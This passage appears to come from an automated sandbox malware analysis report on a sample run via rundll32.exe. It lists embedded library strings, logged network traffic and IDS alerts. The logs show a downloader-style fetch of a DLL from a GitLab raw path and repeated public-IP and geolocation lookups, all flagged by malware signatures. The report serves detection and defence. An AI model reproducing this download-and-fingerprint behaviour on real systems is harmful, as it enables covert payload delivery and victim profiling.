        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: rundll32.exe, 00000003.00000002.3112030805.00007FFE11744000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: System.IO.Compression.ni.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp

        Networking

        barindex
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.26.12.205 0Jump to behavior
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 208.95.112.1 0Jump to behavior
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.65.251.78 0Jump to behavior
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.26.13.205 0Jump to behavior
        Source: global trafficHTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1Host: gitlab.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
        Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: ip-api.com
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: ip-api.com
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49976 -> 208.95.112.1:80
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49964 -> 208.95.112.1:80
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50071 -> 208.95.112.1:80
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50074 -> 208.95.112.1:80
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49933 -> 172.65.251.78:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49956 -> 104.26.13.205:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49968 -> 104.26.13.205:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49972 -> 104.26.13.205:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49962 -> 104.26.13.205:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50072 -> 104.26.12.205:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50069 -> 104.26.12.205:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50073 -> 104.26.12.205:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50070 -> 104.26.12.205:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1Host: gitlab.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
        Source: global trafficDNS traffic detected: DNS query: gitlab.com
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: ip-api.com
        Source: rundll32.exe, 00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:443/
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
        Source: rundll32.exe, 00000003.00000002.3108264897.0000021BDB58E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/P%b
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/y
        Source: rundll32.exe, 00000003.00000002.3108264897.0000021BDB58E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/
        Source: rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0O
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0X
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/P%b
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Y
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidP%b
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.micro
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP%b
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/P%b
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/i
        Source: msedge.exe, 00000006.00000002.1737932930.0000538C0006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in 